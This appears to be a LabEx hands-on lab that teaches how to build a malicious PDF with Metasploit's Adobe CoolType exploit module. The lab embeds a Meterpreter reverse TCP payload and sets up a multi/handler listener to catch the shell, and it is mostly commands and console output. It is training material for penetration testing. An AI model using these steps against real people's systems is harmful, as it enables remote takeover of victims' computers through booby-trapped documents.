LabEx
Log InJoin Free

Create a Malicious PDF File for a Client-Side Attack

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will delve into the world of client-side attacks by creating a malicious PDF file using the Metasploit Framework. Client-side attacks target vulnerabilities in applications on a user's computer, such as web browsers, media players, or document viewers.

PDF files are a common vector for these attacks because they are widely used and often trusted by users. By embedding malicious code (a payload) into a seemingly harmless PDF, an attacker can gain control over a victim's system when the file is opened with a vulnerable PDF reader.

You will learn how to select a specific exploit, configure it with a payload, generate the malicious file, and set up a listener to handle the connection from the compromised system. This lab provides a foundational understanding of how such attacks are constructed.

Select the exploit/windows/fileformat/adobe_cooltype_sing module

In this step, you will start the Metasploit Framework console and select the appropriate exploit module for creating a malicious PDF. The Metasploit Framework is a powerful tool for penetration testing, and its console, msfconsole, is the primary interface for interacting with it.

First, open a terminal and launch the Metasploit console. This may take a moment to initialize.

msfconsole -q

The -q flag suppresses the banner for a quicker start. Once loaded, you'll see the msf6 > prompt.

We will use an exploit that targets a known vulnerability in Adobe Reader. The module is named exploit/windows/fileformat/adobe_cooltype_sing. Use the use command to load this module.

use exploit/windows/fileformat/adobe_cooltype_sing

After executing the command, you will notice that the command prompt changes to reflect the currently loaded module.

msf6 > use exploit/windows/fileformat/adobe_cooltype_sing
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(windows/fileformat/adobe_cooltype_sing) >

This confirms that the module is now active and ready for configuration.

Set the FILENAME option for the output PDF

In this step, you will configure the options for the selected exploit module. Each module has a set of options that you can customize. To see the available options for the current module, use the show options command.

show options

This command will display a table of parameters you can set, such as the filename for the output file and payload settings.

Module options (exploit/windows/fileformat/adobe_cooltype_sing):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.pdf          yes       The file name.
   ...

Payload options (generic/shell_reverse_tcp):
...

We need to set the FILENAME option to specify the name of our malicious PDF file. We'll name it malicious.pdf. Use the set command to assign this value.

set FILENAME malicious.pdf

You can run show options again to verify that the FILENAME has been updated successfully.

FILENAME  malicious.pdf    yes       The file name.

Configure a reverse_tcp payload with LHOST and LPORT

In this step, you will configure the payload. A payload is the code that will be executed on the target system after the exploit is successful. We will use a reverse_tcp payload, which forces the victim's machine to connect back to our machine.

First, set the payload to windows/meterpreter/reverse_tcp. Meterpreter is an advanced, dynamically extensible payload that provides more features than a standard shell.

set payload windows/meterpreter/reverse_tcp

Next, we need to configure the payload's options: LHOST and LPORT.

  • LHOST: This is the "Listening Host," which is your machine's IP address. The victim's machine will connect back to this IP.
  • LPORT: This is the "Listening Port," the port on your machine that will be listening for the connection.

To find your machine's IP address, you can open a new terminal tab and run the ip a command. Look for the IP address associated with the eth0 interface.

ip a

Now, set LHOST to your IP address (replace YOUR_IP_ADDRESS with the actual IP) and LPORT to a common port like 4444.

set LHOST YOUR_IP_ADDRESS
set LPORT 4444

Run show options one more time to confirm all settings are correct. You should see your configured FILENAME, PAYLOAD, LHOST, and LPORT.

Generate the malicious PDF file

In this step, with all the options configured, you are ready to generate the malicious PDF file. The exploit command (or its alias run) will assemble the exploit and the payload into the final file.

Execute the exploit command in your msfconsole window.

exploit

Metasploit will now create the PDF file. The output will show the process and, most importantly, where the file has been saved.

[*] Creating 'malicious.pdf' file...
[+] malicious.pdf stored at /home/labex/.msf4/local/malicious.pdf

The file is now created. In a real-world scenario, an attacker would deliver this file to a target, for example, as an email attachment. You can verify its existence using the ls command in a new terminal.

ls -l /home/labex/.msf4/local/malicious.pdf

-rw-r--r-- 1 labex labex 12345 Date Time /home/labex/.msf4/local/malicious.pdf

Set up a handler in msfconsole to catch the shell

In this step, you will set up a listener, also known as a handler, to "catch" the incoming connection from the victim machine when the malicious PDF is opened. Without a handler, the payload has nowhere to connect to.

We will use the exploit/multi/handler module, which is a generic listener.

use exploit/multi/handler

Now, you must configure this handler with the exact same payload and options (LHOST and LPORT) that you embedded in the PDF file. This is crucial for the connection to succeed.

set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP_ADDRESS
set LPORT 4444

Remember to replace YOUR_IP_ADDRESS with your machine's IP address again.

With the handler configured, run it using the exploit -j command. The -j flag runs the handler as a background job, which keeps your msfconsole prompt free for other commands while the listener is active.

exploit -j

You will see a confirmation that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on YOUR_IP_ADDRESS:4444

The handler is now listening for a connection. In this lab, we will not simulate a victim opening the file, but your setup is complete. You have successfully created a malicious file and prepared a listener to handle the reverse shell.

Summary

In this lab, you have successfully walked through the fundamental steps of creating a malicious PDF for a client-side attack using the Metasploit Framework.

You learned how to:

  • Launch the Metasploit console and select an appropriate exploit module.
  • Configure exploit options, such as the output filename.
  • Select and configure a payload (windows/meterpreter/reverse_tcp) with the necessary LHOST and LPORT parameters.
  • Generate the final malicious PDF file.
  • Set up and run a handler (exploit/multi/handler) to listen for and catch the incoming connection from a compromised system.

This exercise provides a practical understanding of the mechanics behind a common attack vector and highlights the importance of keeping software, especially document readers, up to date to protect against such vulnerabilities.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux